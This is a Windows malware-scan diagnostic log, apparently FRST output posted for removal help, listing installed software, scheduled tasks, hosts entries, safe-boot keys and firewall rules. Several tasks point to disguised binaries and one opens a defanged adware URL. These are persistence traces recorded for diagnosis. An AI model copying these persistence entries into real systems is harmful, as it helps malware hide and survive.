Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.207 - McAfee, Inc.)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{59E4543A-D49D-4489-B445-473D763C79AF}) (Version: 2.0.672.0 - Microsoft Corporation)
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft Office 2010 Service Pack 1 (SP1) (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version: - Microsoft)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.6029.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 37.0.1 - Mozilla)
Mystery P.I. - Curious Case of Counterfeit Cove (x32 Version: 2.2.0.98 - WildTangent) Hidden
MyWinLocker (Version: 4.0.14.35 - Egis Technology Inc.) Hidden
MyWinLocker 4 (x32 Version: 4.0.14.35 - Egis Technology Inc.) Hidden
MyWinLocker Suite (HKLM-x32\...\InstallShield_{17DF9714-60C9-43C9-A9C2-32BCAED44CBE}) (Version: 4.0.14.24 - Egis Technology Inc.)
MyWinLocker Suite (x32 Version: 4.0.14.24 - Egis Technology Inc.) Hidden
Network Secured DNS (HKLM-x32\...\Dnsio) (Version: 1.52.0.0 - Network Secured DNS)
Nexon Launcher (HKLM-x32\...\Nexon Nexon Launcher) (Version: 1.1.1 - Nexon)
NTI Media Maker 9 (HKLM-x32\...\InstallShield_{D3D5C4E8-040F-4C6F-8105-41D43CF94F44}) (Version: 9.0.2.9008 - NTI Corporation)
NTI Media Maker 9 (x32 Version: 9.0.2.9008 - NTI Corporation) Hidden
NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
Office Addin (HKLM-x32\...\{6D2BBE1D-E600-4695-BA37-0B0E605542CC}) (Version: 2.01.3200 - Acer)
Office Addin 2003 (HKLM-x32\...\{1FCC073B-CC01-4443-AD20-E559F66E6E83}) (Version: 2.01.3200 - Acer)
One Finger Death Punch (HKLM-x32\...\Steam App 264200) (Version: - Silver Dollar Games)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version: - )
OpenOffice 4.1.2 (HKLM-x32\...\{E6AD67BB-1C33-4AB3-A387-E0D48137AB70}) (Version: 4.12.9782 - Apache Software Foundation)
osu! (HKLM-x32\...\{12d09afc-32f6-4832-997f-7eb4503e4cdc}) (Version: latest - ppy Pty Ltd)
PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version: - OVERKILL - a Starbreeze Studio.)
Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.206 - Qualcomm Atheros Communications)
Qualcomm Atheros WiFi Driver Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 11.05 - Qualcomm Atheros)
QuickTime 7 (HKLM-x32\...\{80CEEB1E-0A6C-45B9-A312-37A1D25FDEBC}) (Version: 7.78.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6657 - Realtek Semiconductor Corp.)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Shredder (Version: 2.0.8.9 - Egis Technology Inc.) Hidden
Shredder (x32 Version: 2.0.8.9 - Egis Technology Inc.) Hidden
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
Skype™ 7.17 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.17.105 - Skype Technologies S.A.)
Spelunky (HKLM-x32\...\Steam App 239350) (Version: - )
Spotify (HKLM-x32\...\Spotify) (Version: 0.8.4.99.ga249b5f1 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Tales of Lagoona (x32 Version: 2.2.0.110 - WildTangent) Hidden
TeamSpeak 3 Client (HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
Terraria (HKLM-x32\...\Steam App 105600) (Version: - Re-Logic)
The Binding of Isaac: Rebirth (HKLM-x32\...\Steam App 250900) (Version: - Nicalis, Inc.)
The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version: - Bethesda Game Studios)
To the Moon (HKLM-x32\...\Steam App 206440) (Version: - Freebird Games)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)
Voxal Voice Changer (HKLM-x32\...\Voxal) (Version: 1.25 - NCH Software)
Warframe (HKLM-x32\...\Steam App 230410) (Version: - Digital Extremes)
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent)
WildTangent Games App (x32 Version: 4.0.9.3 - WildTangent) Hidden
Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3773202632-424774445-890114178-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {11BD7304-492C-4439-9D34-A81068D0C392} - System32\Tasks\RSPro => C:\Users\owner\AppData\Local\SearchModule\dblaunch.exe
Task: {1A212BEF-CCD3-4085-BB8E-7E2016157EFB} - System32\Tasks\GyazoUpdateTaskMachine => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
Task: {1A546FC0-FA8F-4CED-A832-6AFCE1A6B2DC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {1C4B8754-4CCC-4813-BCFA-E1BACF2369AC} - System32\Tasks\GoogleUpdateTaskAdminS-1-5-21-4287834998-254447837-4126873412-1010 => C:\Program Files\Svc Host\svchost.exe [2016-01-09] (Microsoft)
Task: {22B26FFA-C210-45FC-B7B2-6F1BE8C209B0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-07] (Google Inc.)
Task: {252A8F75-9B4E-46BC-9DE4-07746515D1B0} - System32\Tasks\GTNU_635879831232953538 => Chrome.exe hxxp://www.5web.co/wapi/tudp.php?fp=3D01-4207-D424-6ED1-6316-4FCF-39D7-0D43&amp;cc=CA
Task: {285ED968-B027-4E84-89B2-FCAE719FC597} - System32\Tasks\DeviceDetector => C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe [2012-07-04] (CyberLink)
Task: {2D2677DF-ECED-40D3-9494-DEEFF6DFCBA8} - System32\Tasks\DfGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837 => 50000
Task: {32179E0D-7013-4B23-A43B-8382F890FECB} - System32\Tasks\ALU => C:\Program Files (x86)\Acer\Live Updater\updater.exe [2012-08-29] ()
Task: {3334EB49-C86F-45BD-8145-728921B1AE75} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-26] (Apple Inc.)
Task: {3AF24C5B-AA9E-400C-9823-0632119078A6} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: {43344108-F38A-47C2-8354-25FF3F9A5E00} - System32\Tasks\IBUpd2 => C:\Users\owner\AppData\Local\BrowserAir\47.0.0.3\updater.exe
Task: {4483CAD1-273A-460E-BCD1-7528ABC6361C} - System32\Tasks\System Healer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE
Task: {49E18F13-C232-46E5-B2B9-CB9A6B05EDAF} - System32\Tasks\GyazoUpdateTaskMachineDaily => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
Task: {4B4EA442-4CBE-431C-A8F1-9A6A94D2A2C3} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4287834998-254447837-4126873412-1000Main => 50000,1
Task: {4D7C72BC-0587-426B-A153-339DDDE59812} - System32\Tasks\AdGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010D => C:\Program Files\Explore\iexloprer.exe [2016-01-09] (Microsoft)
Task: {52059878-BC54-47DF-9E6E-CBA49724460E} - System32\Tasks\iuBrowserIEAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe [2012-08-22] ()
Task: {568AAEFF-F3D4-49CE-93DF-AFFCF6ADABF0} - System32\Tasks\Foebyyc => C:\PROGRA~1\GROOVE~1\Sovri.bat
Task: {5D102AA7-504E-4431-A61D-C495A561C3E3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {6A06F2E2-A9E3-4D48-8BA2-0A8D99B9B386} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: {7213CECA-856F-49B0-9BE8-1A0D716FF580} - System32\Tasks\GNU_635879831225933307 => C:\Users\owner\AppData\Roaming\SafeWeb\gsw.exe
Task: {775F46EB-0A69-4534-BCF9-78E95CFD1A8E} - System32\Tasks\Easy Driver Pro Schedule => C:\Program Files (x86)\Probit Software\Easy Driver Pro\EDPTray.exe
Task: {850B6F24-BFEA-4BDC-BB72-E7C8F2C5D23E} - System32\Tasks\Opera scheduled Autoupdate 1452386042 => C:\Program Files (x86)\Opera\launcher.exe
Task: {86C4588C-6DEB-4673-A725-802728388B8C} - System32\Tasks\WebDnsio2-daily => C:\Program Files (x86)\WebDnsio\WebDnsio.exe [2015-11-16] ()
Task: {889A02E4-9406-4332-950C-98E052F215FD} - System32\Tasks\PMMUpdate => C:\Program Files\EgisTec IPS\PMMUpdate.exe [2012-07-11] (Egis Technology Inc.)
Task: {8941FF4A-455A-4F4B-9F2E-1DCD660A1FDE} - System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010 => C:\Program Files\Task Host\taskhost.exe [2016-01-09] (Microsoft)
Task: {A23E1D8E-B2C8-4179-8E36-5F1D94FEB50A} - System32\Tasks\GenericSettingsHandler\Windows-Credentials\RetrySyncTask_for_S-1-5-21-3773202632-424774445-890114178-1001
Task: {A4561249-F93C-42DD-9156-9C763476AE13} - System32\Tasks\ALUAgent => C:\Program Files (x86)\Acer\Live Updater\liveupdater_agent.exe [2012-06-21] ()
Task: {A477CF67-A8F7-4DE2-B002-921BDC79B211} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-07] (Google Inc.)
Task: {AAEA193D-3DD3-4D12-B57E-AD3C71C7F783} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-12-08] (Piriform Ltd)
Task: {AFB865ED-9145-4839-81CC-EB2D84F61DFB} - System32\Tasks\ZcGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412 => C:\Program Files\IIS\iis.exe [2016-01-09] (Microsoft)
Task: {B3552ACF-EA18-40A2-9D83-B3EBA7173A0C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2015-09-27] (Hewlett-Packard)
Task: {B62A1854-5E8B-4971-A249-401D4464FF54} - System32\Tasks\iuEmailOutlookAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe [2012-08-22] ()
Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {BBCA6AF3-1387-4A66-837F-B9936560FBB0} - System32\Tasks\Olunnuag => C:\ProgramData\Olunnuag\1.0.7.1\evmihlus.exe
Task: {BD4E8E43-4441-4A4B-8137-BE0060B0F289} - System32\Tasks\EgisUpdate => C:\Program Files\EgisTec IPS\EgisUpdate.exe [2012-07-11] (Egis Technology Inc.)
Task: {C80AA8E6-C6C0-4160-B234-B2589888E728} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-12-28] (Adobe Systems Incorporated)
Task: {CFC03435-6807-4B22-8F28-92616C6160D2} - System32\Tasks\DriverNavigator Scheduled Scan => C:\Program Files\Easeware\DriverNavigator\DriverNavigator.exe
Task: {D0395F3B-097A-47A4-A07D-D3977F7D3FD0} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-10-28] (Adobe Systems Incorporated)
Task: {D1BE1EA4-7412-4A4B-9468-76D0C35F4DE6} - System32\Tasks\Power Management => C:\Program Files\Acer\Acer Power Management\ePowerTray.exe [2012-08-22] (Acer Incorporated)
Task: {D1D5F7D9-DFF0-4F73-BE19-8BA1E5BA3000} - System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010P => C:\WINDOWS\system32\WindowsPowerShell\taskprocess.exe [2016-01-09] (gltstech.net)
Task: {DBE9B34A-58C0-4CC7-B79B-D7498B9DD164} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe
Task: {DC75A548-011F-44B6-AE74-CDA52157237D} - System32\Tasks\WebDnsio2 => C:\Program Files (x86)\WebDnsio\WebDnsio.exe [2015-11-16] ()
Task: {E06DA7D4-9D01-4CBE-80C7-A4BFD6357661} - System32\Tasks\Goose => C:\Users\owner\AppData\Local\Birds\Settings\goose.dll.dll [2016-01-09] (Birds365)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DriverNavigator Scheduled Scan.job => C:\Program Files\Easeware\DriverNavigator\DriverNavigator.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Goose.job => C:\Users\owner\AppData\Local\Birds\Settings\goose.dll.dll
Task: C:\WINDOWS\Tasks\System HealerPeriod.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
 
Here's the last bit of txt



==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2011-03-16 23:07 - 2011-03-16 23:07 - 04297568 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 14:23 - 2010-10-20 14:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2012-06-21 17:12 - 2012-06-21 17:12 - 01407568 _____ () C:\Program Files (x86)\EgisTec MyWinLocker\x64\LIBEAY32.dll
2015-12-13 15:06 - 2015-12-13 15:06 - 00105984 _____ () C:\Program Files (x86)\NCH Software\ExpressZip\ezcm64.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{34363237-b738-11e5-8285-b888e3a64cff}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{34363238-b738-11e5-8285-b888e3a64cff}

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Kefzha => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 05:25 - 2016-01-09 16:29 - 00000967 ____N C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3773202632-424774445-890114178-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\owner\Desktop\New folder\League Of Legends\anniieee.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{45AFC69B-DD85-491F-A121-0FE3CD033EE4}] => (Allow) C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{4130F6DC-3B45-4354-A49C-FBAD53119841}] => (Allow) C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{0FFFD599-15B6-4858-80E6-7E8449CB35BF}] => (Allow) C:\Program Files (x86)\Acer\Acer Cloud\ccd.exe
FirewallRules: [{5A612CFD-EC4E-405A-A0B2-408B38B82BEF}] => (Allow) C:\Program Files (x86)\Acer\Acer Cloud\ccd.exe
FirewallRules: [{50225025-660C-4102-83C6-FC8803490270}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Photo\WindowsUpnp.exe
FirewallRules: [{F79F52EC-0051-4597-99C6-50FC6511DD76}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Photo\WindowsUpnp.exe
FirewallRules: [{D0008F95-E587-4738-B434-8469678CAF6C}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Photo\DMCDaemon.exe
FirewallRules: [{2372B709-583A-4CA1-8B39-3A3B00BFE118}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Photo\DMCDaemon.exe
FirewallRules: [{FBAFC8A2-3D85-4EBA-8BD9-CC33426247C9}] => (Allow) C:\Program Files (x86)\Acer\clear.fi SDK21\Movie\PlayMovie.exe
FirewallRules: [{661E39FE-A22C-4FF3-9C42-438D8B6252D1}] => (Allow) C:\Program Files (x86)\Acer\clear.fi SDK21\Video\MusicPlayer.exe
FirewallRules: [{ADD89591-BF1D-4A9E-8CB6-5FADAB2F65BD}] => (Allow) C:\Program Files (x86)\Acer\clear.fi SDK21\Video\VideoPlayer.exe
FirewallRules: [{6EC0726F-932C-4F82-A2C4-F27A6C774D21}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Media\WindowsUpnpMV.exe
FirewallRules: [{D18EF725-A515-48B4-AA17-58A6021DA880}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Media\WindowsUpnpMV.exe
FirewallRules: [{196AA019-79B8-4BFB-9F13-856ED2E77025}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Media\DMCDaemon.exe
FirewallRules: [{087A0E6D-C921-4258-A987-A1EECF0D98BE}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Media\DMCDaemon.exe
FirewallRules: [{957139A4-98EE-42C2-B5AA-51A269DE88BE}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{382E3C32-7A8A-40EE-8CBF-4C700B59B1E2}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{03CEFACE-01E8-4DF6-8929-CCD5BFFB4D31}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{748587E8-CA09-41CE-84AF-3866BD51D39D}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{E85DAA5B-5347-4398-8862-0791C240EF99}] => (Allow) C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe
FirewallRules: [{1B8B50EA-455F-4836-AA1A-FE1CCD4070E2}] => (Allow) C:\Program Files (x86)\NTI\Acer Backup Manager\FileExplorer.exe
FirewallRules: [{0B1C6426-DE02-4BE3-9BE4-C8D7AA5B9F3B}] => (Allow) C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
FirewallRules: [{45D560FA-E29D-483B-AAE9-89B06D273334}] => (Allow) C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManager.exe
FirewallRules: [{862083EF-C645-422D-B63B-D4B591E79347}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{496BAAEC-1EEA-4342-9368-F2CA236BF833}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A602A103-F637-46DC-A7B1-AD2D8BC9C5B3}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{F46B58C5-67AA-4520-B0B6-90F3003FA328}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{72BDFD15-1D3C-4A36-9169-132C84E2BDED}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Spelunky\Spelunky.exe
FirewallRules: [{D49ABA06-CD5E-4A24-B168-304FDEF23904}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Spelunky\Spelunky.exe
FirewallRules: [{54DD60BA-0703-404D-B3DD-A8C48E6527FA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Bloody Trapland\Bloody Trapland.exe
FirewallRules: [{03671CCF-F445-46EA-88F5-5B83727C2905}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Bloody Trapland\Bloody Trapland.exe
FirewallRules: [{4884F52E-8313-4EC3-BCF2-1C4B4338476D}] => (Allow) C:\Users\owner\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{8D8AE82D-DA33-451E-9108-EABAAFF48AD8}] => (Allow) C:\Users\owner\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{6CD803A6-6D40-4EE2-993E-4CCCB190C24F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{09C531A4-AF25-4C8E-A7A9-4D8894DB5DDD}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{DB461A63-FE1C-4ABF-856E-FEDC49440827}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe
FirewallRules: [{6B2A2449-DBEE-418A-B769-747D260C3191}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe
FirewallRules: [{1AD76F74-BB66-4FC2-B32C-FD0157E51F0D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BattleBlock Theater\BattleBlockTheater.exe
FirewallRules: [{985A62D7-2625-4CEC-9FCB-C0746AC37E74}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BattleBlock Theater\BattleBlockTheater.exe
FirewallRules: [{C2054F28-7AEF-4491-B6F0-A2C7414B9195}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Broforce\Broforce_beta.exe
FirewallRules: [{4712CD1F-307D-4A3D-9A14-AC6FF380D125}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Broforce\Broforce_beta.exe
FirewallRules: [{3FE407AE-5250-4459-ABDE-24ED2CC6E583}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\To the Moon\To the Moon\To the Moon.exe
FirewallRules: [{4076E0CF-810A-4FF3-B4AD-AF06FDEA8566}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\To the Moon\To the Moon\To the Moon.exe
FirewallRules: [{B62A2FEF-D57D-4387-9D11-65BC412A88CF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\To the Moon\Minisode_1\Sigmund Holiday Special 1\Siggy - Holiday Special.exe
FirewallRules: [{277C55A8-7073-432B-A447-A2E728429E93}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\To the Moon\Minisode_1\Sigmund Holiday Special 1\Siggy - Holiday Special.exe
FirewallRules: [{AB498CEE-CC1A-4951-BADC-1CA3CF7B9E45}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\To the Moon\Minisode_2\Sigmund Holiday Special 2\SigCorp Minisode 2.exe
